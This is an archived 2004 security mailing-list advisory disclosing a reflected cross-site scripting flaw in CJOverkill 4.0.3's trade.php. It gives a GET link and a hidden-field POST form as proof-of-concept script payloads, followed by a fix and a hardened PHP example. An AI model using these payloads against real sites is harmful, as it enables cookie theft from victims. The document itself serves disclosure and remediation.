Open Source and information security mailing list archives
From: acidbits at gmail.com (aCiDBiTS)
Subject: CJOverkill 4.0.3 XSS Proof of Concept

+--------------------------------------------------------+
| CJOverkill 4.0.3 Cross Site Scripting Proof of Concept |
| By aCiDBiTS        acidbits@...il.com      10-Oct-2004 |
+--------------------------------------------------------+

    [                                              ]
    [ Your web application needs a security audit? ]
    [                 Email me !                   ]
    [                                              ]

------------
Introduction
------------

(http://cjoverkill.icefire.org/) "CJOverkill is a powerful traffic
trading script that keeps its users happy with their site's growing
traffic. Tested on high traffic sites and proven its outstanding
performance, CJOverkill's security measures prevent others from trying
to cheat you. With this script, you can rest assured your site is in
good hands."


-------------
Vulnerability
-------------

Some parameters in trade.php are not sanitised before being echoed back.
This can be exploited to inject HTML/script code that is executed in the
user's browser, allowing an attacker to steal the user's cookie for that
site. Older versions may also be vulnerable.
The vendor has been notified; an official patch will be released.


----------------
Proof of Concept
----------------

There are two ways to XSS through trade.php:

(1.) GET. The victim must follow a link such as the one below (requires register_globals ON):

http://URL_to_cjoverkill_script/trade.php?tms[0]=Yes,%20there%20is%20a%20way%20;-)%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E


(2.) POST. The victim must submit a form carrying the following hidden fields:

<form action="http://URL_to_cjoverkill_script/trade.php" method="post">
<input name="email" type="hidden" value="fake">
<input name="add" type="hidden" value="1">
<input name="url" type="hidden" value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;">
<input name="" type="submit" value="Click me !">
</form>


---------
Quick fix
---------

Edit trade.php, line 135:

	echo ("$tms[$i]<br>");

Replace it with:

	echo (htmlspecialchars($tms[$i])."<br>");
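
As an added illustration (not code from the advisory or from the CJOverkill
project), the fragment below puts the echo line quoted above next to a hardened
version that encodes with ENT_QUOTES and an explicit charset, and adds a check
for the POST "url" field so a script tag is rejected before it is ever stored.
The variables $tms and $url are assumed to carry the request values described
above; the sample input is constructed.

```php
<?php
// Added example, not CJOverkill code: encode every untrusted value at output time.
// $tms stands for the request array the advisory describes (assumption).

// Pattern from trade.php line 135: raw request data is echoed as HTML.
function render_unsafe(array $tms): string {
    $out = '';
    for ($i = 0; $i < count($tms); $i++) {
        $out .= "$tms[$i]<br>";   // a <script> element in $tms[$i] is rendered live
    }
    return $out;
}

// Hardened version: HTML-encode with ENT_QUOTES so the value is also inert inside
// single- or double-quoted attributes, ENT_SUBSTITUTE so malformed bytes cannot
// disable encoding, and an explicit charset. Non-string entries (tms[0][x]=...)
// are dropped instead of being coerced.
function render_safe(array $tms): string {
    $out = '';
    foreach ($tms as $value) {
        if (!is_string($value)) {
            continue;
        }
        $out .= htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '<br>';
    }
    return $out;
}

// For the POST path: accept only absolute http(s) URLs for the "url" field
// (allow-list on the scheme), and still encode the value wherever it is shown.
function valid_trade_url(string $url): bool {
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Constructed sample input mirroring the advisory's GET payload.
$tms = ['Yes, there is a way ;-)<script>alert(1)</script>'];
echo render_safe($tms);                                   // tags shown as text
var_dump(valid_trade_url('<script>alert(1)</script>'));   // rejected
var_dump(valid_trade_url('http://example.com/'));         // accepted
```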

